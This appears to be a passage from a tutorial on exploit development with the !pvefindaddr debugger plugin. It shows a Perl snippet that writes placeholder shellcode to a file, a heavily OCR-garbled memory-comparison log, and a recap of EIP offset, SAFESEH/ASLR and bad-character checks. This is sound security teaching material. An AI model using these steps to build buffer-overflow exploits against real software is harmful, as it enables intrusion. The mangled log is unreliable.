There is also a nice perl script that shows you how to do it on the !pvefindaddr wiki:

\*\*\*\*\*

my \$shellcode="\xcc\xcc\xcc"; #paste your shellcode here open(FILE,">c:\\temp\\shellcode.bin"); binmode FILE; print FILE \$shellcode; close(FILE);

We then run the whole exploit (with the shellcode included, without any breakpoints or anything), now that the app has crashed we compare it:

!pvefindaddr compare C:\shellcode Return Value must be a string

After it is finished we can either view the Log Windows or open compare.txt from the Immunity Debugger folder:

| ODHDF 00D                        | فمتحاد المتحاد المتحاد المتحاد المتحاد المتحاد المتحاد المتحاد |                                                                                                    |                      |               |       |  |  |  |  |  |  |
|----------------------------------|----------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------|---------------|-------|--|--|--|--|--|--|
| 0BADF00D<br>0BADF00D<br>0BADF00D | P pvefindaddr Memory                                           | comparison results                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         | Oddposs                                                        | Status                                                                                                    | Tupo                 |               |       |  |  |  |  |  |  |
| ØBADFØØD                         | HUUTESS                                                        | 000005                                                                                                    | Type                 | <u>^</u>      |       |  |  |  |  |  |  |
| ØBADFØØD                         | 0X02DH3HC0                                                     | Unmodified                                                                                                    | asoli                |               |       |  |  |  |  |  |  |
| ØBADFØØD                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| 02083800                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| UBHDFUUD                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| <b>NRHDENND</b>                  |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| 0BHDF00D                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| OBHDFOOD                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| 0BHDF00D                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| OBHUFOOD                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| 00HDF00D                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| 00HDF00D                         |                                                                |                                                                                                    |                      |               | 95000 |  |  |  |  |  |  |
| ABONEAAN                         |                                                                |                                                                                                    |                      | • • • • • •   | 2 100 |  |  |  |  |  |  |
| <b>ABADEAAD</b>                  |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| <b>ABADEAAD</b>                  |                                                                |                                                                                                    |                      | $\sim$        |       |  |  |  |  |  |  |
| ØBADFØØD                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         | Compare memory with byte                                       | es in file                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         | Reading file C:\shellood                                       | de (ascii)                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         | Read 200 bytes from file                                       |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         | Starting search in memor                                       | 9                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         | -> searching for \xfc\                                         | xe8/x89/x00/x00/x00/x60/                                                                                                    | (89                  |               |       |  |  |  |  |  |  |
| UBHDFUUD                         | Comparing bytes from fi                                        | le with memory :                                                                                                    |                      |               |       |  |  |  |  |  |  |
| 020H3HC0                         | <ul> <li>Reading memory at Ic</li> </ul>                       | cation : 0x02DH3HC0                                                                                                    |                      |               |       |  |  |  |  |  |  |
| 0BHDF00D                         | -> Mooray, ascii she                                           | elloode unmoalflea                                                                                                    |                      |               |       |  |  |  |  |  |  |
| OBHUFOOD                         |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| OBHUFOOD                         | Reading file Cryshellow                                        | la (eveneding to unicode)                                                                                                    |                      |               |       |  |  |  |  |  |  |
| 0BHDF00D                         | Reading file constructed (expanding to Unicode)                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ABONEAAN                         | Read 200 bytes from file                                       |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| <b>ABADEAAD</b>                  | Unicode expanded to 400                                        | hutes                                                                                                    |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         | Starting search in memory                                      | NU CONTRACTOR OF CONTRACTOR OF |                      |               |       |  |  |  |  |  |  |
| ØBADFØØD                         | -> searching for \sfc                                          | x00\xe8\x00\x89\x00\x00\                                                                                                    | 00\x00\x00\x00\x00\x | 00\x60\x00\x8 | 9\800 |  |  |  |  |  |  |
| ØBADFØØD                         | Could not find code in r                                       | nemory !                                                                                                    |                      |               |       |  |  |  |  |  |  |
|                                  |                                                                |                                                                                                    |                      |               |       |  |  |  |  |  |  |
| Invotinda                        | addr aamnara Cilaballa                                         | ada.                                                                                                    |                      |               |       |  |  |  |  |  |  |

#### !p∨efindaddr compare C:\shellcode

Return Value must be a string

Now a quick review on what we managed to do in this tutorial:

- We have determined the exact offset before EIP gets overwritten and also a register that points to our buffer.

- We have found our type of exploit, and some information on how to structure it

- Found out which modules have SAFESEH, ASLR or get rebased
- Found the instruction we needed avoiding these modules and the OS modules aswell
- Checked if our shellcode contains bad characters.

So as you can see we did all the above with just !pvefindaddr and we also managed to save a good amount of time.